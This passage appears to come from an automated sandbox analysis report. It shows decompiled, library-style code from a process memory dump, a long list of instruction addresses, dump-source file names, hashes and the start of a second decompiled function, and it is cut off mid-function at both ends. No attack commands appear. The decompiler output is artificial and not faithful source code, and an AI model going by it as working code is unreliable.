												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04B86DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04B8F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04B8F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04B8F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04B8FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04B8FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04B8F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04B8F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04C14CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04B9D130(_t427, _t494, _t511);
				}
			}










































































                                                    0x04c15ba5
                                                    0x04c15baa
                                                    0x04c15baf
                                                    0x04c15bb4
                                                    0x04c15bb6
                                                    0x04c15bbc
                                                    0x04c15bbe
                                                    0x04c15bc4
                                                    0x04c15bcd
                                                    0x04c15bd3
                                                    0x04c15bd6
                                                    0x04c15bdc
                                                    0x04c15be0
                                                    0x04c15be3
                                                    0x04c15beb
                                                    0x04c15bf2
                                                    0x04c15bf8
                                                    0x04c15bfe
                                                    0x04c15c04
                                                    0x04c15c0e
                                                    0x04c15c18
                                                    0x04c15c1f
                                                    0x04c15c25
                                                    0x04c15c2a
                                                    0x04c15c2c
                                                    0x04c15c32
                                                    0x04c15c3a
                                                    0x04c15c3f
                                                    0x04c15c42
                                                    0x04c15c48
                                                    0x04c15c5b
                                                    0x04c15c5b
                                                    0x04c15c2c
                                                    0x04c15cb7
                                                    0x04c15cb9
                                                    0x04c15cbf
                                                    0x04c15cc2
                                                    0x04c15cca
                                                    0x04c15ccb
                                                    0x04c15ccb
                                                    0x04c15cd1
                                                    0x04c15cd7
                                                    0x04c15cda
                                                    0x04c15ce1
                                                    0x04c15ce4
                                                    0x04c15ce7
                                                    0x04c15ced
                                                    0x04c15cf3
                                                    0x04c15cf9
                                                    0x04c15cff
                                                    0x04c15d08
                                                    0x04c15d0a
                                                    0x04c15d0e
                                                    0x04c15d10
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d16
                                                    0x04c15d1a
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d20
                                                    0x04c15d22
                                                    0x04c15d25
                                                    0x04c15d2f
                                                    0x04c15d2f
                                                    0x04c15d33
                                                    0x04c15d3d
                                                    0x04c15d49
                                                    0x04c15d4b
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d5a
                                                    0x04c15d5d
                                                    0x04c15d60
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d66
                                                    0x04c15d69
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d6f
                                                    0x04c15d6f
                                                    0x04c15d73
                                                    0x04c15d79
                                                    0x04c15d7f
                                                    0x04c15d86
                                                    0x04c15d95
                                                    0x04c15d98
                                                    0x04c15dba
                                                    0x04c15dcb
                                                    0x04c15dce
                                                    0x04c15dd3
                                                    0x04c15dd6
                                                    0x04c15dd8
                                                    0x04c15de6
                                                    0x04c15dec
                                                    0x04c15dee
                                                    0x04c15df1
                                                    0x04c15df3
                                                    0x04c1635a
                                                    0x04c1635a
                                                    0x00000000
                                                    0x04c1635a
                                                    0x04c15dfe
                                                    0x04c15e02
                                                    0x04c15e05
                                                    0x04c15e07
                                                    0x04c15e10
                                                    0x04c15e13
                                                    0x04c15e1b
                                                    0x04c15e1c
                                                    0x04c15e21
                                                    0x04c15e22
                                                    0x04c15e23
                                                    0x04c15e25
                                                    0x04c15e2a
                                                    0x04c15e2c
                                                    0x04c15e2e
                                                    0x04c15e36
                                                    0x04c15e39
                                                    0x04c15e42
                                                    0x04c15e47
                                                    0x04c15e4d
                                                    0x04c15e54
                                                    0x04c15e54
                                                    0x04c15e54
                                                    0x04c15e2e
                                                    0x04c15e5c
                                                    0x04c15e5f
                                                    0x04c15e62
                                                    0x04c15e64
                                                    0x04c15e6b
                                                    0x04c15e70
                                                    0x04c15e7a
                                                    0x04c15e7a
                                                    0x04c15e7a
                                                    0x04c15e6b
                                                    0x04c15e7e
                                                    0x04c15e7f
                                                    0x04c15e7f
                                                    0x04c15e81
                                                    0x04c15e87
                                                    0x04c15e8b
                                                    0x04c15e8c
                                                    0x04c15e8c
                                                    0x04c15e8c
                                                    0x04c15e9a
                                                    0x04c15e9c
                                                    0x04c15ea2
                                                    0x04c15ea6
                                                    0x04c15f50
                                                    0x04c15f50
                                                    0x04c15f57
                                                    0x04c15f66
                                                    0x04c15f66
                                                    0x04c15f66
                                                    0x04c15f68
                                                    0x04c15f6a
                                                    0x04c163d0
                                                    0x00000000
                                                    0x04c15f70
                                                    0x04c15f70
                                                    0x04c15f91
                                                    0x04c15f9c
                                                    0x04c15f9e
                                                    0x04c15fa4
                                                    0x04c15fa6
                                                    0x04c1638c
                                                    0x04c16392
                                                    0x04c163a1
                                                    0x04c163a7
                                                    0x04c163af
                                                    0x04c163af
                                                    0x04c163bd
                                                    0x04c163d8
                                                    0x00000000
                                                    0x04c163d8
                                                    0x04c15fac
                                                    0x04c15fb2
                                                    0x04c15fb4
                                                    0x04c15fbd
                                                    0x04c15fc6
                                                    0x04c15fce
                                                    0x04c15fd4
                                                    0x04c15fdc
                                                    0x04c15fec
                                                    0x04c15fed
                                                    0x04c15fee
                                                    0x04c15fef
                                                    0x04c15ff9
                                                    0x04c15ffa
                                                    0x04c15ffb
                                                    0x04c15ffc
                                                    0x04c16000
                                                    0x04c16004
                                                    0x04c16012
                                                    0x04c16012
                                                    0x04c16018
                                                    0x04c16019
                                                    0x04c1601a
                                                    0x04c1601b
                                                    0x04c1601c
                                                    0x04c16020
                                                    0x04c16059
                                                    0x04c1605c
                                                    0x04c16061
                                                    0x04c16061
                                                    0x04c16022
                                                    0x04c16022
                                                    0x04c16022
                                                    0x04c16025
                                                    0x04c1602a
                                                    0x04c1602b
                                                    0x04c16031
                                                    0x04c16037
                                                    0x04c16038
                                                    0x04c1603e
                                                    0x04c16048
                                                    0x04c16049
                                                    0x04c1604a
                                                    0x04c1604b
                                                    0x04c1604c
                                                    0x04c1604d
                                                    0x04c16053
                                                    0x04c16054
                                                    0x04c16054
                                                    0x04c16062
                                                    0x04c16065
                                                    0x04c16067
                                                    0x04c1606a
                                                    0x04c16070
                                                    0x04c16075
                                                    0x04c16076
                                                    0x04c16081
                                                    0x04c16087
                                                    0x04c16095
                                                    0x04c16099
                                                    0x04c1609e
                                                    0x04c160a4
                                                    0x04c160ae
                                                    0x04c160b0
                                                    0x04c160b3
                                                    0x04c160b6
                                                    0x04c160b8
                                                    0x04c160ba
                                                    0x04c160ba
                                                    0x04c160ba
                                                    0x04c160ba
                                                    0x04c160be
                                                    0x04c160c0
                                                    0x04c160c5
                                                    0x04c160c5
                                                    0x04c160c5
                                                    0x04c160c6
                                                    0x04c160cd
                                                    0x04c16114
                                                    0x04c160cf
                                                    0x04c160cf
                                                    0x04c160d4
                                                    0x04c160d5
                                                    0x04c160da
                                                    0x04c160db
                                                    0x04c160e1
                                                    0x04c160e2
                                                    0x04c160e8
                                                    0x04c160f8
                                                    0x04c160fd
                                                    0x04c160fe
                                                    0x04c16102
                                                    0x04c16104
                                                    0x04c16107
                                                    0x04c16109
                                                    0x04c1610b
                                                    0x04c1610b
                                                    0x04c1610b
                                                    0x04c1610b
                                                    0x04c1610f
                                                    0x04c1610f
                                                    0x04c16117
                                                    0x04c1611a
                                                    0x04c1611f
                                                    0x04c16125
                                                    0x04c16134
                                                    0x04c16139
                                                    0x04c1613f
                                                    0x04c16146
                                                    0x04c16148
                                                    0x04c1614b
                                                    0x04c1614d
                                                    0x04c1614f
                                                    0x04c1614f
                                                    0x04c1614f
                                                    0x04c1614f
                                                    0x04c16153
                                                    0x04c16159
                                                    0x04c16159
                                                    0x04c1615c
                                                    0x04c16163
                                                    0x04c16169
                                                    0x04c1616c
                                                    0x04c16172
                                                    0x04c16181
                                                    0x04c16186
                                                    0x04c16187
                                                    0x04c1618b
                                                    0x04c16191
                                                    0x04c16195
                                                    0x04c161a3
                                                    0x04c161bb
                                                    0x04c161c0
                                                    0x04c161c3
                                                    0x04c161cc
                                                    0x04c161d0
                                                    0x04c161dc
                                                    0x04c161de
                                                    0x04c161e1
                                                    0x04c161e4
                                                    0x04c161e6
                                                    0x04c161e8
                                                    0x04c161e8
                                                    0x04c161e8
                                                    0x04c161e8
                                                    0x04c161e6
                                                    0x04c161ec
                                                    0x04c161f3
                                                    0x04c16203
                                                    0x04c16209
                                                    0x04c1620a
                                                    0x04c16216
                                                    0x04c1621d
                                                    0x04c16227
                                                    0x04c16241
                                                    0x04c16246
                                                    0x04c1624c
                                                    0x04c16257
                                                    0x04c16259
                                                    0x04c1625c
                                                    0x04c1625e
                                                    0x04c16260
                                                    0x04c16260
                                                    0x04c16260
                                                    0x04c16260
                                                    0x04c1625e
                                                    0x04c16264
                                                    0x04c16267
                                                    0x04c16269
                                                    0x04c16315
                                                    0x04c16315
                                                    0x04c1631b
                                                    0x04c1631e
                                                    0x04c16324
                                                    0x04c16327
                                                    0x04c1632f
                                                    0x04c16330
                                                    0x04c16333
                                                    0x04c1633a
                                                    0x04c1633c
                                                    0x04c16335
                                                    0x04c16335
                                                    0x04c16335
                                                    0x04c1633f
                                                    0x04c16342
                                                    0x04c1634c
                                                    0x04c16352
                                                    0x04c16355
                                                    0x04c16355
                                                    0x04c16359
                                                    0x00000000
                                                    0x04c1626f
                                                    0x04c16275
                                                    0x04c16275
                                                    0x04c16278
                                                    0x04c1627e
                                                    0x04c1627e
                                                    0x04c16281
                                                    0x04c16287
                                                    0x04c1628d
                                                    0x04c16298
                                                    0x04c1629c
                                                    0x04c162a2
                                                    0x04c1629e
                                                    0x04c1629e
                                                    0x04c1629e
                                                    0x04c162a7
                                                    0x04c162a7
                                                    0x04c162aa
                                                    0x04c162b0
                                                    0x04c162f0
                                                    0x04c162f0
                                                    0x04c162f2
                                                    0x04c162f8
                                                    0x04c162fd
                                                    0x04c162b2
                                                    0x04c162b2
                                                    0x04c162b2
                                                    0x04c162b5
                                                    0x04c162dd
                                                    0x04c162e2
                                                    0x04c162e5
                                                    0x04c162b7
                                                    0x04c162b8
                                                    0x04c162bb
                                                    0x04c162bd
                                                    0x04c162c0
                                                    0x04c162c4
                                                    0x04c162cd
                                                    0x04c162cd
                                                    0x04c162c0
                                                    0x04c162bb
                                                    0x04c162b5
                                                    0x04c16302
                                                    0x04c16303
                                                    0x04c16305
                                                    0x04c16305
                                                    0x04c16305
                                                    0x04c1630c
                                                    0x04c1630c
                                                    0x00000000
                                                    0x04c1627e
                                                    0x04c16269
                                                    0x04c15eac
                                                    0x04c15ebb
                                                    0x04c15ebe
                                                    0x04c15ecb
                                                    0x04c15ecb
                                                    0x04c15ece
                                                    0x04c15ece
                                                    0x04c15ed4
                                                    0x04c15ed7
                                                    0x04c15ed9
                                                    0x04c15edb
                                                    0x04c15edb
                                                    0x04c15ee1
                                                    0x04c15ee1
                                                    0x04c15ee3
                                                    0x04c15f20
                                                    0x04c15f20
                                                    0x04c15ee5
                                                    0x04c15ee5
                                                    0x04c15ee5
                                                    0x04c15ee8
                                                    0x04c15f11
                                                    0x04c15f18
                                                    0x04c15eea
                                                    0x04c15eea
                                                    0x04c15eed
                                                    0x04c15ef2
                                                    0x04c15ef8
                                                    0x04c15efb
                                                    0x04c15f0a
                                                    0x04c15f0a
                                                    0x04c15eed
                                                    0x04c15ee8
                                                    0x04c15f22
                                                    0x04c15f28
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15f30
                                                    0x04c15f31
                                                    0x04c15f37
                                                    0x04c15f3a
                                                    0x04c15f3d
                                                    0x04c15f44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15f46
                                                    0x04c15f48
                                                    0x04c15f4d
                                                    0x00000000
                                                    0x04c15f4d
                                                    0x04c15dda
                                                    0x04c15ddf
                                                    0x00000000
                                                    0x04c15ddf
                                                    0x04c15dd8
                                                    0x04c15da7
                                                    0x04c15da9
                                                    0x04c15dac
                                                    0x04c15dae
                                                    0x00000000
                                                    0x04c15db4
                                                    0x04c15db4
                                                    0x00000000
                                                    0x04c15db4
                                                    0x04c15dae
                                                    0x04c15d88
                                                    0x04c15d8d
                                                    0x04c16363
                                                    0x04c16369
                                                    0x04c1636a
                                                    0x04c16370
                                                    0x04c16372
                                                    0x04c1637a
                                                    0x04c1637b
                                                    0x04c1637d
                                                    0x00000000
                                                    0x00000000
                                                    0x04c1637f
                                                    0x04c16385
                                                    0x00000000
                                                    0x04c16385
                                                    0x04c15d38
                                                    0x04c15d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d3b
                                                    0x04c15d27
                                                    0x04c15d29
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c16360
                                                    0x00000000
                                                    0x04c16360
                                                    0x04c15c10
                                                    0x04c15c10
                                                    0x04c163da
                                                    0x04c163e5
                                                    0x04c163e5

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78a77268549f7312b1ac63692e1bba688d16e9755ec44510daabb09c07e2736b
                                                    • Instruction ID: 77c4c055943056948683dd35bf31570d54b7075c8fbdd870c03c9b149b666240
                                                    • Opcode Fuzzy Hash: 78a77268549f7312b1ac63692e1bba688d16e9755ec44510daabb09c07e2736b
                                                    • Instruction Fuzzy Hash: 95424E75E00219DFDB24CF68C880BA9B7B2FF46304F1581AAD84DEB251D774AA85DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B64120, Relevance: .4, Instructions: 444COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E04B64120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4c3d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04B7F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04B66E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04B64620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04B66E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
